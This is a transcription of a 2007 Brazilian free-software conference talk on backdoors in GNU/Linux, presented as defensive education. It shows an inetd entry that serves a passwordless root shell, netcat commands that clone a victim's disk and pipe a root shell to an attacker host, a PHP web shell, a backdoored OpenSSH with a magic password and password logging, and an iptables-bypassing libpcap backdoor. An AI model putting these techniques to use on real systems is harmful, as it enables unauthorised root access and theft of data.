II ENSL. Backdoors em Sistemas GNU/Linux: Conhecendo Para Se Proteger.

Transcrição

1 II ENSL II Encontro Nordestino de Software Livre Backdoors em Sistemas GNU/Linux: Conhecendo Para Se Proteger. Jansen Sena Aracaju, SE Setembro, 2007

2 Sobre o palestrante Formação Mestrado pelo IC na Unicamp/SP Segurança de redes Administração de Sistemas Unix LPI Certified Professional Atividades BenQ Mobile Revista PC&CIA Comunidade SOL Software Livre Consultor em TI

3 Anatomia geral de ataque Data Gathering Specific attack tasks Targed? Nontarged? Exploitation Elevate Privilegies Black Hat? Script Kiddie? Insiders? Methodology? Metastasis? Install Backdoors Cover Tracks

4 Explorando o inetd O que é inetd? Internet Super Server Presente na maioria dos sistemas Unix Gerencia recebimento de conexões para serviços Como explorar? Implementação simples e rápida Não requer de componentes externos Criar uma nova entrada de serviço apontando para um interpretador de comandos (e.g. sh)

5 Explorando o inetd Criando a backdoor na vítima... Inserir entrada em /etc/inetd.conf daytime stream tcp nowait root /bin/sh sh i Nome do serviço cuja porta está especificada em /etc/ services Usuário dono do processo... determina o privilégio! O que deve ser executado??? Reiniciar o inetd na vítima # /etc/init.d/inetutils inetd restart Explorando backdoor a partir do sistema atacante $ netcat <endereco IP vitima> daytime

6 Explorando o inetd Acesso direto de superusuário sem necessidade de senha!!! Atacante scadufax ( ) Vítima smeagol ( )

7 phpremoteshell Página Web em PHP que recebe comandos e os submete para execução no servidor Fácil instalação Saída dos comandos é impressa no browser cópia do arquivo PHP para pasta visível pelo servidor Web Dificuldade: maioria dos servidores Apache não executam com privilégios de root

8 phpremoteshell

9 Netcat Clonando o disco rígido da vítima... Vítim ( a ) Copia bit a bit a partição /dev/hda1 e repassa como entrada para o netcat #2 Atacant e( ) #1 $ netcat l p 5000 > hda1.img Transfere pela rede dados Direciona saída para o arquivo hda1.img # dd if=/dev/hda1 netcat

10 Netcat Shell de super usuário sem senha! Acesso direto de superusuário sem necessidade de senha!!! Atacante Vítima scadufax ( ) smeagol ( ) #1 #2 $ netcat # netcat l p sh Submete string contendo o comando a ser executado (e.g. mkdir /etc/ataque) string é repassada ao sh e interpretada como comando!

11 Netcat Shell de super usuário sem senha! Acesso direto de superusuário sem necessidade de senha!!! Atacante scadufax ( ) Vítima smeagol ( )

12 Netcat Shell de super usuário sem senha! (cont.) Atacante não tem, nesse caso, o retorno dos comandos enviados ao sistema atacado Saída do sh pode ser redirecionada para o sistema do atacante... Atacante com duas ações Uma para enviar os comandos para o sistema da vítima e outra para receber o resultado dos comandos executados no sistema da vítima

13 Netcat Acesso direto de superusuário sem necessidade de senha!!! Atacante Vítima scadufax ( ) Submete string contendo o comando a ser executado (e.g. mkdir /etc/ataque) smeagol ( ) $ netcat #2 Saída do comando é encaminhada como entrada ao netcat conectado ao sistema do atacante... # netcat l p sh netcat scadufax string é repassada ao sh e interpretada como comando! #1 $ netcat l p 50000

14 Netcat

15 OpenSSH (backdoored) OpenSSH (backdoored version) Utilizado para acesso remoto seguro Sensação de segurança... Comunicação entre cliente e servidor é protegida por recursos criptográficos Chaves são trocadas no primeiro acesso Comprometimento pode não estar no trânsito dos dados pela rede!!! É possível manipular informações não protegidas nas pontas do túnel sob proteção criptográfica

16 OpenSSH (backdoored) OpenSSH Server (Backdoored) Atacante Protected traffic from sniffers Check for magic password Cliente autêntic o Magic Password File Password logfile Linux Authentication System

17 OpenSSH (backdoored) Dois parâmetros devem ser utilizados... Arquivo de log para registrar passwords utilizadas Arquivo de configuração contendo o magic password e a versão do servidor... Sem parâmetros, funciona como um server normal MD5 correspondente ao magic password (e.g. nsn )

18 OpenSSH (backdoored) Executando o servidor... #./sshd p 2222 n /tmp/.cfg s /tmp/.passlist

19 Silentdoor Connectionless backdoor Permite execução de comandos no sistema comprometido sem necessidade de senhas Capaz de subverter filtragem do netfilter/iptables Sysadmins confiam em regras do iptables Estão acima de qualquer suspeita (???) Explora sensação de segurança Implementado como prova de conceito Utiliza o acesso provido pela libpcap

20 Silentdoor Arquitetura geral Applications Upper layers DROPACCEPT... iptables Lower layers Atacante Special silentdoor package to 53 port libpcap SILENTDOOR

21 Silentdoor Executando o daemon... #./silence& Silentedoor daemon process

22 Silentdoor Bloqueando o tráfego com o iptables...

23 Silentdoor Executando o ataque...

24 Silentdoor Um pouco mais sobre o silentdoor... Não provê acesso a shell......mas permite a execução de quaisquer comandos Consegue manter se bem escondido Dificuldade: dependência da libnet e libpcap Alternativa: Safebreaker Existem outros backdoors que executam comandos embutidos em pacotes ICMP!!!

25 Finalmente... Ampla diversidade Sofisticação de soluções Conhecer é a melhor estratégia para proteger se Ambiente de testes! Pensar como atacante Evite software proprietário! Backdoor???

26

27

28

29

30 Mais que 1000 palavras...

31 Mais que 1000 palavras...

32 Mais que 1000 palavras...

33 Mais que 1000 palavras...

34 Mais que 1000 palavras...

35 Mais que 1000 palavras...

36 Mais que 1000 palavras...

37 Erro de erro??? :-(

38 O importante é dar o primeiro passo...

39 ... compartilhar conhecimento...

40 ... e logo você entenderá o poder de uma... COMUNIDADE!!!

41 Perguntas e dúvidas? Sonho que se sonha só, é só um sonho que se sonha só, mas sonho que se sonha junto é realidade. Raul Seixas

42 MUITO OBRIGADO!!! Que a Força esteja com vocês!